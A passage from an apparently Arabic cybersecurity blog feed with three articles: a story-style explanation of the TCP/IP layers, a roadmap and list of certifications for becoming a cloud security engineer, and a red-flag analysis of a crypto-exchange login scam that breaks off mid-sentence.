&lt;p&gt;يهدف هذا المقال إلى إزالة الغموض وإنهاء الصراع الأزلي بين عالم الشبكات المتشابك والطلاب المهتمين بعالم الأمن السيبراني بشكل خاص، من خلال رؤية جديدة ومختلفة لنموذج الاتصال عبر الشبكة الشهير TCP/IP والذي يشكل أساساً قوياً وفعالاً لمعظم الإتصالات عبر شبكة الإنترنت الواسعة!&lt;/p&gt;
&lt;h2 id=&quot;بداية-الرحلة&quot;&gt;بداية الرحلة&lt;/h2&gt;
&lt;p&gt;Alice، الموظفة المجتهدة، تعمل في شركة متواضعة تقدم خدمات معينة، الشركة عبارة عن بناء بسيط مؤلف من ثلاثة طوابق وكل طابق مسؤول عن قسم محدد من المهام، يقع مكتب صديقتنا Alice في الدور الثالث (الطابق الأخير في مبنى الشركة).&lt;/p&gt;
&lt;p&gt;بينما كانت صديقتنا منشغلة بتأدية مهامها، تلقت اتصالاً مباغتاً من إحدى صديقاتها لتخبرها أنه لم يتبق سوى وقت قليل جداً على انتهاء التسجيل والتقدم بطلب للحصول على جواز سفر والذي لطالما انتظرت الحصول عليه طويلاً لكن انشغالها بعملها منعها من التقدم ومتابعة هذا الأمر.&lt;/p&gt;
&lt;p&gt;– ماذا أفعل؟! التسجيل سينتهي اليوم ولا أستطيع ترك عملي، لا يمكنني أيضاً تجاهل تقديم طلب الحصول على جواز سفر جديد..&lt;/p&gt;
&lt;h2 id=&quot;الطابق-الثالث--طبقة-التطبيقات-application-layer&quot;&gt;الطابق الثالث &amp;lt;=&amp;gt; طبقة التطبيقات (Application Layer)&lt;/h2&gt;
&lt;p&gt;بعد تفكير مطوّل، قررت Alice طلب المساعدة من موظف الدعم الذي يعمل معها في نفس الطابق يدعى Http:&lt;/p&gt;
&lt;p&gt;– Alice: مرحباً Http هل يمكنك الذهاب إلى مبنى الهجرة والجوازات والتقدم بطلب الحصول على جواز سفر جديد نيابة عني؟، لا أستطيع الذهاب بسبب انشغالي بالعمل.&lt;/p&gt;
&lt;p&gt;+ Http: نعم، يمكنني المساعدة.&lt;/p&gt;
&lt;p&gt;– Alice: شكراً جزيلاً، إليك جميع أوراقي ومعلوماتي قمت بوضعها بهذا المصنف، لكن انتبه لا تقل لأحد أنك تحمل مصنفاً وإنما Data.&lt;/p&gt;
&lt;p&gt;+ Http: حسناً، فهمت.&lt;/p&gt;
&lt;p&gt;ولأن مبنى الشركة متواضع فلم يكن هناك مصعد مما دفع Http المسكين إلى استخدام السلم..&lt;/p&gt;
&lt;h2 id=&quot;الطابق-الثاني--طبقة-النقل-transport-layer&quot;&gt;الطابق الثاني &amp;lt;=&amp;gt; طبقة النقل (Transport Layer)&lt;/h2&gt;
&lt;p&gt;عندما وصل Http إلى الطابق الثاني قابل رئيس قسم الاتصالات الصادرة والواردة من وإلى الشركة والذي يدعى TCP:&lt;/p&gt;
&lt;p&gt;– TCP: أهلاً Http، إلى أين أنت ذاهب؟!.&lt;/p&gt;
&lt;p&gt;+ Http: أهلاً، يجب علي توصيل ال Data الخاصة ب Alice إلى مبنى الهجرة والجوازات.&lt;/p&gt;
&lt;p&gt;– TCP: حسناً، قبل أن تذهب يجب أن تعرف أن رقم الغرفة التي يجب عليك تقديم طلب Alice من خلالها هو 80، أيضاً سأقوم باتصال صغير (SYN,SYN-ACK,ACK) لأتأكد من أنه يوجد أحد من أصدقائي الموظفين في الطابق الثاني في ذلك المبنى جاهز لاستقبالك.&lt;/p&gt;
&lt;p&gt;+ Http: شكراً لك، سأذهب الآن.&lt;/p&gt;
&lt;p&gt;– TCP: انتظر لحظة، لا يمكنك أخذ جميع هذه ال Data معك، قم بنقلها على مراحل لأتأكد من أنها ستصل بشكل سليم ولا تقل لأحد أنك تحمل Data، بل Segments.&lt;/p&gt;
&lt;p&gt;+ Http: اتفقنا.&lt;/p&gt;
&lt;p&gt;غادر Http الطابق الثاني متجهاً نحو الطابق الأول، من ينتظره هناك يا تُرى؟&lt;/p&gt;
&lt;h2 id=&quot;الطابق-الأول--طبقة-الإنترنت-internet-layer&quot;&gt;الطابق الأول &amp;lt;=&amp;gt; طبقة الإنترنت (Internet Layer)&lt;/h2&gt;
&lt;p&gt;كان بانتظاره مدير عمليات توجيه الطلبات الصادرة والواردة من وإلى الشركة السيد IP:&lt;/p&gt;
&lt;p&gt;– IP: هذا أنت Http، ما كل هذا الذي تحمله؟ ما هي وجهتك؟!&lt;/p&gt;
&lt;p&gt;+ Http: يتوجب عليّ توصيل هذه ال Segments الخاصة ب Alice إلى مبنى الهجرة والجوازات في أسرع وقت.&lt;/p&gt;
&lt;p&gt;– IP: فهمت، لحسن الحظ أننا التقينا لأنني واثق أنك لا تعرف عنوان مبنى الهجرة والجوازات.&lt;/p&gt;
&lt;p&gt;+ Http: أنت محق، أنا حقاً لا أعرف عنوان المبنى، إن هذه ال Segments التي أحملها ثقيلة وهي التي منعتني من تذكر هذا الأمر.&lt;/p&gt;
&lt;p&gt;– IP: لا تقلق، لديّ الحل، يمكنك ترك بعض منها عندي لتخفف حملك خاصة أن الطابق الذي في الأسفل لن يتمكن من تحمل رؤيتك مع كل هذه الحمولة، تفضل، هذا هو عنوان مبنى الهجرة والجوازات، أنت الآن أصبحت تحمل Packets نيابة عن Segments، تذكر هذه النقطة جيداً.&lt;/p&gt;
&lt;p&gt;+ Http: شكراً جزيلاً لك.&lt;/p&gt;
&lt;p&gt;تابع Http طريقه إلى الطابق الأرضي وهو يتساءل متى ستنتهي هذه الطوابق ويخرج من هذه الشركة بسرعة؟&lt;/p&gt;
&lt;h2 id=&quot;الطابق-الأرضي--طبقة-الربط-link-layer&quot;&gt;الطابق الأرضي &amp;lt;=&amp;gt; طبقة الربط (Link Layer)&lt;/h2&gt;
&lt;p&gt;عندما وصل Http أخيراً إلى الطابق الأرضي، كان في استقباله رئيس قسم عمليات الربط في الشركة والذي يدعى Ethernet:&lt;/p&gt;
&lt;p&gt;– Ethernet: أهلاً Http، في الحقيقة لقد تعرفت عليك بصعوبة.&lt;/p&gt;
&lt;p&gt;+ Http: أنت محق حتى أنا لم أعد أعرف نفسي.&lt;/p&gt;
&lt;p&gt;– Ethernet: علمت أنك ذاهب إلى مبنى الهجرة والجوازات، قمت بتجهيز هذا العنوان لك (MAC Address)، أعلم أنك تعرف عنوان المبنى ولكن عندما تصل إلى مبنى الهجرة والجوازات قم بإعطائهم هذا العنوان لزيادة التأكد من أنك وصلت إلى المبنى الصحيح، لا تقل أنك تحمل Packets وإنما أصبحت تحمل Frames.&lt;/p&gt;
&lt;p&gt;+ Http: فهمت ما تعنيه جيداً، شكراً لك.&lt;/p&gt;
&lt;p&gt;قام Ethernet بتوصيل Http إلى باب الخروج من الشركة وسط فرحة عارمة شعر بها Http، حيث كان السائق بانتظاره.&lt;/p&gt;
&lt;h2 id=&quot;رحلة-السائق-و-http-في-البحث-عن-المبنى-الهدف&quot;&gt;رحلة السائق و Http في البحث عن المبنى الهدف&lt;/h2&gt;
&lt;p&gt;– السائق: أهلاً Http، ماهي وجهتك؟&lt;/p&gt;
&lt;p&gt;+ Http: أريد الذهاب إلى مبنى الهجرة والجوازات، لكن من فضلك أريد أن أصل بسرعة.&lt;/p&gt;
&lt;p&gt;– السائق: في الحقيقة، أنا لا أعرف طريق الذهاب إلى ذلك المبنى بشكل مباشر، لكن لا تقلق سنتوقف أثناء رحلتنا في بعض المحطات ونطلب منهم مساعدتنا في الوصول إلى المبنى المقصود.&lt;/p&gt;
&lt;p&gt;خلال رحلتهما توقفا في عدة محطات لطلب المساعدة في الحصول على الطريق الصحيح، حتى وصلا أخيراً إلى المبنى المنشود.&lt;/p&gt;
&lt;h2 id=&quot;وصول-http-إلى-مبنى-الهجرة-والجوازات&quot;&gt;وصول Http إلى مبنى الهجرة والجوازات&lt;/h2&gt;
&lt;p&gt;فور دخول Http إلى المبنى، استقبله Ethernet في الطابق الأرضي وطلب منه ال Frames الذي يحملهم، ثم أخذ منه المعلومات اللازمة وقال له مرحباً بك لقد وصلت إلى المكان الصحيح، اصعد إلى الطابق الأول لاستكمال معالجة طلبك، في الطابق الأول قام بتسليم ال Packets إلى السيد IP، أيضاً تم أخذ المعلومات والقيام بالإجراءات اللازمة، ثم صعد بعدها إلى الطابق الثاني وقام بتسليمهم ال Segments التي يحملها واستدل على مكان الغرفة رقم 80 للبدء بإجراءات تقديم الطلب الخاص ب Alice، انتقل بعدها إلى الطابق الأخير وقام بتسليم ال Data المطلوبة لعملية التسجيل وهناك تم إخباره أنه وصل في الوقت المناسب وأن استقبال الطلبات الجديدة قد انتهى.&lt;/p&gt;
&lt;p&gt;– قم بإخبار Alice أن عملية التسجيل على جواز السفر الجديد قد تمت بنجاح من دون أي أخطاء.&lt;/p&gt;
&lt;p&gt;انتابت Http مشاعر متقلبة بين فرح وحزن؛ فرح لأنه قام بتأدية المهمة التي طُلبت منه على أكمل وجه وحزن لأنه سيعود ليخوض رحلة العودة بنفس تفاصيل الرحلة الأولى من أجل أن يخبر Alice أنه نجح بالمهمة.&lt;/p&gt;
&lt;h2 id=&quot;الخاتمة-أهمية-الطبقات-في-نقل-البيانات&quot;&gt;الخاتمة: أهمية الطبقات في نقل البيانات&lt;/h2&gt;
&lt;p&gt;بدت لنا رحلة Http وكأنها مغامرة شيّقة عبر مبنى من الطوابق المترابطة، ولكنها في الحقيقة تُجسّد تعقيد وبراعة عمليات نقل البيانات عبر شبكة الإنترنت، فكل خطوة، وكل طبقة، تلعب دوراً حيوياً لضمان وصول المعلومات بشكل آمن وموثوق، مما يُظهر مدى تناغم وتكامل هذه الأنظمة التي نستخدمها يومياً دون أن ندرك تعقيداتها.&lt;/p&gt;
&lt;p&gt;إذاً، في كل مرة تتصفح فيها الإنترنت أو تقوم بإرسال طلب ما، تذكر أن هناك خلف الكواليس رحلة معقدة تجري في الخفاء، يقودها بطل مثل Http ليصل بك إلى وجهتك الرقمية، إنها رحلة خفية لكنها أساسية، تربط العالم الرقمي بأسره وتؤكد لنا أن البساطة التي نراها أمامنا ما هي إلا ثمرة نظام مُتقن يعمل بلا توقف.&lt;/p&gt;
</content:encoded><category>الشبكات</category><category>الشبكات</category><category>TCP/IP</category><category>طبقات الشبكة</category><category>HTTP</category><category>TCP</category></item><item><title>اصنع مستقبلك كمهندس أمن سحابي</title><link>https://blog.cyberpedia.site/cloud-security-engineer/</link><guid isPermaLink="true">https://blog.cyberpedia.site/cloud-security-engineer/</guid><description>خارطة طريق لتصبح مهندس أمن سحابي: أنواع مهندسي الأمن السحابي، وخطوات التعلم، وأهم الشهادات مثل CCSP وAWS Security، ومصادر مفيدة للبدء.</description><pubDate>Sun, 01 Sep 2024 19:24:19 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;مهندس الأمن السحابي مسؤول عن تصميم وتنفيذ استراتيجيات أمنية تحمي الأنظمة السحابية، ويحتاج إلى أساسيات الأمن الإلكتروني وفهم منصات مثل AWS وAzure وGoogle Cloud. يبدأ المسار بتعلم الأمن ثم السحابة ثم التخصص واكتساب خبرة عملية، مع شهادات مثل Security+ وCCSP وAWS Certified Security – Specialty.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;مع تزايد الاعتماد على الخدمات السحابية وتنامي التهديدات الأمنية الإلكترونية، أصبح دور مهندس الأمن السحابي (Cloud Security Engineer) أكثر أهمية من أي وقت مضى.
يتطلب هذا الدور الجمع بين المعرفة العميقة في مجال الأمن الإلكتروني وفهم متقدم للبنية التحتية السحابية.
في هذا المقال، سنتناول كيفية بناء مسارك المهني لتصبح Cloud Security Engineer ناجحا، مع تسليط الضوء على الفروقات بين الأنواع المختلفة من مهندسي الأمن السحابي،
وتوضيح خارطة الطريق المطلوبة، والشهادات الضرورية، ومدى أهمية أن تكون مهندسا متعدد السحابة (Multi-Cloud Engineer).&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;رسم توضيحي لمهام مهندس الأمن السحابي: التشفير وإدارة الهوية والوصول IAM والحوكمة السحابية وحماية الأنظمة السحابية&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-01.BOz3fpuj_awa0r.webp&quot;&gt;&lt;/p&gt;
&lt;h2 id=&quot;ما-هو-مهندس-الأمن-السحابي&quot;&gt;ما هو مهندس الأمن السحابي؟&lt;/h2&gt;
&lt;p&gt;مهندس الأمن السحابي هو الشخص المسؤول عن تصميم وتنفيذ استراتيجيات أمنية لحماية الأنظمة السحابية من التهديدات الإلكترونية.
يتطلب هذا الدور فهماً عميقاً لأنواع الخدمات السحابية المختلفة (AWS, Azure, Google Cloud)، بالإضافة إلى المهارات التقنية في مجالات مثل التشفير، وإدارة الهوية والوصول (IAM) والحوكمة السحابية.&lt;/p&gt;
&lt;h2 id=&quot;أنواع-مهندسي-الأمن-السحابي&quot;&gt;أنواع مهندسي الأمن السحابي&lt;/h2&gt;
&lt;p&gt;&lt;img alt=&quot;ثلاثة أنواع لمهندسي الأمن السحابي: المتخصص في مزود سحابي واحد، ومتعدد السحابة، ومهندس السحابة الهجينة&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-02.CXLo7Ha8_Z2wKV0C.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;يمكن تقسيم مهندسي الأمن السحابي إلى عدة أنواع بناءً على مهاراتهم ومسؤولياتهم:&lt;/p&gt;
&lt;h3 id=&quot;1-مهندس-أمن-سحابي-متخصص-في-مزود-سحابي-معين&quot;&gt;1. مهندس أمن سحابي متخصص في مزود سحابي معين&lt;/h3&gt;
&lt;p&gt;هؤلاء المهندسون يركزون على مزود سحابي محدد مثل AWS أو Azure. هم يعرفون تفاصيل وأدوات الأمن الخاصة بهذه المنصات ويكونون قادرين على الاستفادة من هذه الأدوات بشكل فعال.&lt;/p&gt;
&lt;h3 id=&quot;2-مهندس-أمن-سحابي-متعدد-السحابة-multi-cloud-security-engineer&quot;&gt;2. مهندس أمن سحابي متعدد السحابة (Multi-Cloud Security Engineer)&lt;/h3&gt;
&lt;p&gt;يمتلك هؤلاء المهندسون خبرة في العمل مع أكثر من مزود سحابي.
يهدفون إلى توفير حلول أمنية تعمل بسلاسة عبر مختلف المنصات السحابية، مما يسمح للشركات بالاستفادة من مزايا كل منصة بشكل آمن.&lt;/p&gt;
&lt;h3 id=&quot;3-مهندس-أمن-السحابة-الهجينة-hybrid-cloud-security-engineer&quot;&gt;3. مهندس أمن السحابة الهجينة (Hybrid Cloud Security Engineer)&lt;/h3&gt;
&lt;p&gt;هؤلاء المهندسون يتعاملون مع بيئات تحتوي على مزيج من البنية التحتية المحلية والسحابية.
يتطلب هذا الدور مهارات في إدارة أمان البيانات والنظام عبر البنية التحتية الهجينة.&lt;/p&gt;
&lt;h2 id=&quot;خارطة-الطريق-لتصبح-cloud-security-engineer&quot;&gt;خارطة الطريق لتصبح Cloud Security Engineer&lt;/h2&gt;
&lt;p&gt;إليك خارطة طريق تساعدك في بناء مسارك المهني لتصبح Cloud Security Engineer:&lt;/p&gt;
&lt;h3 id=&quot;1-اكتساب-المعرفة-الأساسية-في-الأمن-الإلكتروني&quot;&gt;1. اكتساب المعرفة الأساسية في الأمن الإلكتروني&lt;/h3&gt;
&lt;p&gt;ابدأ بتعلم أساسيات الأمن الإلكتروني، مثل التشفير، وجدران الحماية، واكتشاف التهديدات.
يمكن أن تكون شهادات مثل CompTIA Security+ نقطة انطلاق جيدة.&lt;/p&gt;
&lt;h3 id=&quot;2-تعلم-أساسيات-السحابة&quot;&gt;2. تعلم أساسيات السحابة&lt;/h3&gt;
&lt;p&gt;تعرف على المفاهيم الأساسية للحوسبة السحابية وخدماتها. يمكن أن تكون شهادات مثل AWS Certified Solutions Architect – Associate أو Microsoft Certified: Azure Fundamentals مفيدة هنا.&lt;/p&gt;
&lt;h3 id=&quot;3-التخصص-في-مجال-الأمن-السحابي&quot;&gt;3. التخصص في مجال الأمن السحابي&lt;/h3&gt;
&lt;p&gt;ركز على تعلم أدوات وتقنيات الأمن الخاصة بمنصة سحابية معينة. يمكن أن تكون شهادات مثل AWS Certified Security Specialty أو Microsoft Certified: Azure Security Engineer Associate مفيدة في هذا السياق.&lt;/p&gt;
&lt;h3 id=&quot;4-اكتساب-خبرة-عملية&quot;&gt;4. اكتساب خبرة عملية&lt;/h3&gt;
&lt;p&gt;احصل على خبرة عملية من خلال العمل على مشاريع حقيقية أو محاكاة الهجمات الأمنية في بيئات سحابية.
العديد من المنصات تقدم خدمات مثل “مختبرات الأمن السحابي” لتوفير تجارب عملية.&lt;/p&gt;
&lt;h3 id=&quot;5-الانتقال-إلى-التخصص-المتقدم&quot;&gt;5. الانتقال إلى التخصص المتقدم&lt;/h3&gt;
&lt;p&gt;بمجرد اكتساب الخبرة الأساسية، يمكنك الانتقال إلى تخصصات أكثر تعقيدا، مثل إدارة الهوية والوصول أو التشفير السحابي، أو أمن الشبكات السحابية.&lt;/p&gt;
&lt;h3 id=&quot;6-النظر-في-أن-تصبح-مهندس-متعدد-السحابة&quot;&gt;6. النظر في أن تصبح مهندس متعدد السحابة&lt;/h3&gt;
&lt;p&gt;مع زيادة عدد الشركات التي تعتمد على أكثر من منصة سحابية، يصبح الطلب على مهندسي الأمن السحابي المتعددين أكبر.
يتطلب هذا الدور تعلم كيفية تطبيق حلول أمنية تعمل عبر مختلف المنصات.&lt;/p&gt;
&lt;h2 id=&quot;شهادات-مهندس-الأمن-السحابي&quot;&gt;شهادات مهندس الأمن السحابي&lt;/h2&gt;
&lt;p&gt;هناك العديد من الشهادات التي يمكن أن تعزز مسيرتك المهنية كمهندس أمن سحابي:&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;خمس شهادات لمهندس الأمن السحابي: CompTIA Security+ وCCSP وAWS Certified Security – Specialty وAzure Security Engineer Associate وGoogle Professional Cloud Security Engineer&quot; width=&quot;1600&quot; height=&quot;1109&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-03.DaS5o3IT_ZBYAyx.webp&quot;&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;CompTIA Security+:&lt;/strong&gt; توفر هذه الشهادة أساسيات الأمن الإلكتروني وتعتبر نقطة انطلاق مهمة لأي شخص يرغب في دخول مجال الأمن.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Certified Cloud Security Professional (CCSP):&lt;/strong&gt; تعتبر هذه الشهادة واحدة من أبرز الشهادات في مجال الأمن السحابي وتغطي جوانب مثل حماية البيانات السحابية، وأمن التطبيقات، وإدارة الهوية.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;AWS Certified Security – Specialty:&lt;/strong&gt; تركيز على توفير الحلول الأمنية في بيئة AWS. تعتبر هذه الشهادة مثالية لأولئك الذين يركزون على هذه المنصة.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Microsoft Certified: Azure Security Engineer Associate:&lt;/strong&gt; توفر هذه الشهادة معرفة متقدمة بأدوات وتقنيات الأمن في Azure.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Google Professional Cloud Security Engineer:&lt;/strong&gt; موجهة نحو المهندسين الذين يركزون على حماية بيئات Google Cloud.&lt;/li&gt;
&lt;/ol&gt;
&lt;h2 id=&quot;هل-يجب-أن-تكون-مهندسا-متعدد-السحابة&quot;&gt;هل يجب أن تكون مهندسا متعدد السحابة؟&lt;/h2&gt;
&lt;p&gt;في عالم يتزايد فيه الاعتماد على مختلف مزودي الخدمات السحابية، يصبح من المفيد أن تكون مهندسا متعدد السحابة.
هذا التوجه يمكن أن يفتح لك المزيد من الفرص المهنية ويساعدك في العمل على مشاريع متنوعة تتطلب خبرة في أكثر من منصة سحابية.
لكن يجب أن تدرك أن هذا يتطلب استثمارا كبيرا في التعلم المستمر والبقاء على اطلاع على التطورات التقنية في أكثر من منصة.&lt;/p&gt;
&lt;h2 id=&quot;مصادر-تساعدك-في-رحلتك&quot;&gt;مصادر تساعدك في رحلتك&lt;/h2&gt;
&lt;p&gt;إليك بعض المصادر التي يمكن أن تساعدك في رحلتك لتصبح Cloud Security Engineer:&lt;/p&gt;
&lt;h3 id=&quot;1-الكتب&quot;&gt;1. الكتب&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;“Cloud Security and Privacy” من تأليف Tim Mather وSubra Kumaraswamy.&lt;/li&gt;
&lt;li&gt;“Architecting the Cloud” من تأليف Michael J. Kavis.&lt;/li&gt;
&lt;li&gt;“CCSP Certified Cloud Security Professional All-in-One Exam Guide” من تأليف Daniel Carter.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;2-الدورات-والشهادات&quot;&gt;2. الدورات والشهادات&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;دورات على منصات مثل Coursera وUdemy حول الأمن السحابي (علما ان تجمع الشباب السوري يوفر وصول مجاني للسوريين للدورات الموجودة على كورسيرا).&lt;/li&gt;
&lt;li&gt;الشهادات التي تم ذكرها في الأقسام السابقة مثل CCSP وAWS Certified Security – Specialty.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;3-المجتمعات-والمنتديات&quot;&gt;3. المجتمعات والمنتديات&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;المشاركة في منتديات مثل &lt;a href=&quot;https://www.reddit.com/r/cybersecurity/&quot;&gt;Reddit (r/cloudsecurity)&lt;/a&gt; وStack Overflow.&lt;/li&gt;
&lt;li&gt;الانضمام إلى مجموعات مهنية مثل &lt;a href=&quot;https://cloudsecurityalliance.org/&quot;&gt;Cloud Security Alliance (CSA)&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;الخاتمة&quot;&gt;الخاتمة&lt;/h2&gt;
&lt;p&gt;أن تصبح Cloud Security Engineer يتطلب استثمارا كبيرا في التعليم والخبرة العملية.
من خلال اتباع خارطة الطريق المذكورة أعلاه، واكتساب الشهادات المطلوبة، والبقاء على اطلاع على أحدث التطورات في المجال، يمكنك بناء مسيرة مهنية ناجحة في هذا المجال المتزايد الأهمية.
تذكر أن تستمر في تطوير مهاراتك والبحث عن الفرص للتعلم والنمو في هذا المجال المتطور باستمرار.&lt;/p&gt;
</content:encoded><category>المسار المهني والشهادات</category><category>الأمن السحابي</category><category>Cloud Security Engineer</category><category>شهادات الأمن السيبراني</category><category>CCSP</category><category>Multi-Cloud</category></item><item><title>طرق مبتكرة للاحتيال عبر منصات العملات المشفرة</title><link>https://blog.cyberpedia.site/cryptocurrency-scams/</link><guid isPermaLink="true">https://blog.cyberpedia.site/cryptocurrency-scams/</guid><description>تحليل خطوة بخطوة لعملية احتيال تبدأ برسالة على تويتر فيها بيانات دخول حساب عملات مشفرة، والعلامات الحمراء التي تكشفها والأسئلة التي تحميك منها.</description><pubDate>Fri, 26 Jul 2024 21:52:17 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;يرسل المحتال بيانات دخول حساب على منصة عملات مشفرة مزيفة يظهر فيه رصيد ضخم، ثم يطلب منك الموقع إنشاء حساب VIP وإيداع أموال من محفظتك لتتمكن من سحب الرصيد، فتُفرغ محفظتك. من علاماته: مرسل غريب بلا متابعين ولا ردود، ومسافة داخل رابط الموقع، وغياب أي مراجعات للمنصة، وطلب الدفع من أموالك لتحريك أموال موجودة على المنصة.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;من المهم أن تكتشف أو تعرف ما إذا كنت تواجه عملية احتيال عبر الانترنت وخاصة إذا كانت تهتم بالتداول عبر منصات العملات الرقمية المشفرة!
في هذا المقال سنحدد لك جميع العلامات الحمراء التي يجب أن تكتشفها والأسئلة التي يجب أن تجيب عليها عندما تواجهك أي رسالة أو موقف احتيالي مع الإشارة والشرح لعملية احتيال حديثة خاصة بتبادل العملات المشفرة.&lt;/p&gt;
&lt;p&gt;أفضل طريقة لتجنب الوقوع في عمليات الاحتيال هي التفكير دائماً بشكل نقدي مع المزيد من الشك، ماذا ستفعل إذا ارسل إليك شخص ما رسالة مباشرة على Twitter مع بيانات اعتماد تسجيل الدخول لبعض الحسابات في منصات العملات المشفرة وطلب المساعدة في سحب الأموال من هذه الحسابات؟!&lt;/p&gt;
&lt;p&gt;الأمر الصحيح الذي يجب فعله هو تجاهل الرسالة ولكن ربما يراودك أن هذا الأمر قد يكون حقيقي وستسأل نفسك: ماذا لو كانت هذه فرصتك للثراء؟
دعونا نلقي نظرة على هذا الأمر الجذاب بشكل صحيح ونضع قائمة بجميع العلامات الحمراء مع الإشارة والشرح على حادثة حقيقة لعملية استهداف من مثل هذا النوع&lt;/p&gt;
&lt;h2 id=&quot;في-البداية-دعنا-نلقي-نظرة-على-لقطة-شاشة-للرسالة-التالية&quot;&gt;في البداية دعنا نلقي نظرة على لقطة شاشة للرسالة التالية&lt;/h2&gt;
&lt;p&gt;&lt;img alt=&quot;رسالة مباشرة على تويتر من حساب مجهول تحتوي اسم موقع وحساب وكلمة سر ورصيد 762157.66 USDT مع طلب المساعدة في إدارته&quot; width=&quot;1600&quot; height=&quot;1084&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-01.DKFC5Szi_Z1F9Gr3.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;يرسل لك شخص غريب على Twitter بيانات الاعتماد المفترضة لحساب معين على بعض منصات العملات المشفرة&lt;/p&gt;
&lt;p&gt;وحسب قوله إنها تحتوي على مبلغ مكون من ستة أرقام يبدو أن المرسل يحتاج إلى مساعدتك لسحب هذا المبلغ، والمثير للدهشة إذا ذهبت إلى الموقع وأدخلت بيانات الاعتماد فسيتم نقلك إلى حساب شخصي حقيقي يحتوي على المبلغ المحدد أو رقم قريب منه
لكن إلى الآن لم نكتشف عملية الاحتيال بعد!&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;لوحة حساب على منصة العملات المشفرة المزيفة تعرض رصيدًا قدره 852695.66 USDT ومستوى VIP5 وأزرار الإيداع والسحب والتحويل&quot; width=&quot;1600&quot; height=&quot;1015&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-02.TSauYklO_EH6K.webp&quot;&gt;&lt;/p&gt;
&lt;h2 id=&quot;فكر-بشكل-نقدي-وابحث-عن-العلامات-الحمراء&quot;&gt;فكر بشكل نقدي وابحث عن العلامات الحمراء&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;لنبدأ بالأساسيات: إذا كان لديك بضع مئات الآلاف من الدولارات فهل ستطلب من شخص غريب تماماً المساعدة في إدارتها؟&lt;/p&gt;
&lt;p&gt;بالتأكيد لا ولن يفعل أي شخص آخر هذا الأمر!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;المنطق وحده كافي لإرسال الرسالة (وجميع الرسائل الاحتيالية الأخرى الغير مرغوب به) إلى سلة المحذوفات فوراً، و لكن نحن لن نقوم بذلك وسنقوم بعملية التحقيق في جميع العلامات الحمراء وتحليل واكتشاف عملية الاحتيال
دعونا نجد سبباً للمتابعة:
لنفترض أن الظروف قد أجبرت بالفعل شخص غريب تماماً على طلب المساعدة وأن اختياره قد وقع عليك، ما الذي يبدو غير منطقي في هذا الأمر؟&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;الملف الشخصي لصاحب الرسالة على تويتر: صفر تغريدات وصفر متابعين وصفر متابَعين، وهي علامات حمراء&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-03.B6lsk3tZ_hTeX0.webp&quot;&gt;&lt;/p&gt;
&lt;h3 id=&quot;في-البداية-دعونا-نتعرف-على-فاعل-الخير-المجهول-بشكل-أفضل&quot;&gt;في البداية دعونا نتعرف على فاعل الخير المجهول بشكل أفضل&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;أولاً:&lt;/strong&gt; حساب Twitter الخاص به لا يحتوي على أي متابعين وهو لا يتابع أي من الحسابات الأخرى وهذا الأمر هو علامة حمراء أخرى واضحة؛ لأن الهدف الحقيقي من إنشاء حساب على وسائل التواصل الاجتماعي هو التواصل ومتابعة الآخرين.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;ثانياً:&lt;/strong&gt; هذا الشخص ليس اجتماعياً، لقد حاولنا إرسال رسائل له لكننا لم نتلق أي رد وهذه أيضاً علامة حمراء أخرى تشير إلى أن هذه الرسالة عبارة عن رسالة بريدية جماعية، وهذا يعني أنه قد تم إرسال نفس الرسالة التي تحوي على اسم المستخدم وكلمة المرور لعشرات أو مئات أو حتى آلاف الأشخاص.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;كم نسبة هؤلاء الأشخاص الذين تعتقد أنهم حاولوا بالفعل تسجيل الدخول؟&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;ثالثاً:&lt;/strong&gt; علامة حمراء أخرى، يشير اسم المستخدم وكلمة المرور إلى أن المستخدم اسمه Adam (اسم المستخدم وكلمة السر هي “Adam” بالمناسبة ضعيفة جداً)
في حين أن اسم الحساب على Twitter الذي جاءت منه الرسالة لا علاقة له باسم Adam، هل من الممكن أن المهاجم يريد مننا أن نفرغ حساب مخترق لعملات مشفرة ويجعلنا شركاء في الجريمة؟
في الواقع لا توجد أي عملات رقمية مشفرة في هذا الحساب، تابع القراءة لتدرك حقيقة هذا الأمر.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;أخيراً:&lt;/strong&gt; سيرصد الخبراء علامة حمراء أخرى وهي المسافة في عنوان URL للموقع حيث من المفترض أن توجد العملة المشفرة، هذه هي الطريقة التي يحاول بها المحتالون تجاوز الحماية الخاصة بفحص وفلترة الروابط
